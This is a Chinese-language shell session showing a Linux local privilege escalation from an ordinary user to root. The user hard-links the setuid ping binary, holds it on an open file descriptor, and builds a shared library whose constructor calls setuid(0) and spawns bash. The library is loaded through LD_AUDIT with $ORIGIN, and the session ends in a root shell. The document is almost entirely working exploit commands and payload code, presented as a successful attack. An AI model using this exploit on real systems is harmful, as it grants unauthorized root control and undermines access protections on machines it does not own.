首先创建一个普通用户,并且给普通用户设置一个密码,保证能用su 命令能用普通用户登录
[root@ahu ~]# useradd test
[root@ahu ~]# passwd test
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
[root@ahu ~]# su - test
[test@ahu ~]$ whoami
test //登陆到普通用户,发现创建不了其他用户
[test@ahu ~]$ useradd aaa
-bash: /usr/sbin/useradd: Permission denied
进行身份变换
[test@ahu ~]$ mkdir /tmp/exploit
[test@ahu ~]$ ln /bin/ping /tmp/exploit/target
[test@ahu exploit]$ exec 3< /tmp/exploit/target
[test@ahu exploit]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target
[test@ahu exploit]$ rm -rf /tmp/exploit/
[test@ahu exploit]$ ls -l /proc/$$/fd/3
[test@ahu ~]$ vim payload.c
void __attribute__((constructor)) init() //在配置文件加入如下的内容
{
setuid(0);
system("/bin/bash");
}
~
[test@ahu ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@ahu ~]$ ls -l /tmp/exploit
[test@ahu ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@ahu ~]# whoami
root
发现身份变成了 root用户。身份变换成功!